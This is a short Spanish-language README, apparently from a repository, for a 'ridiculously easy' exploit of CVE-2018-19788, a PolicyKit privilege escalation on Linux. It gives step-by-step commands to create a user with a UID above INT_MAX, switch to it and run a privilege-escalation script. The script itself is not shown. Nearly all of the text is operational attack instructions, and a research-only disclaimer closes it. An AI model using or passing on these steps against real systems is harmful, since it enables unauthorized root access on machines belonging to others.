
Exploit sencillo para CVE-2018-19788
Exploit absurdamente fácil para CVE-2018-19788
Para usar esto, debes crear un usuario con UID > INT_MAX en Policy Kit o ya tener un usuario con bajos privilegios con dicho UID.
El UID se puede especificar en la creación del usuario de la siguiente manera, y usarse antes de la ejecución del script:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Ten en cuenta que esto es solo para fines de investigación y eres responsable de tu propio uso de cualquier código encontrado en este repositorio o en cualquier otro, como dicta el sentido común.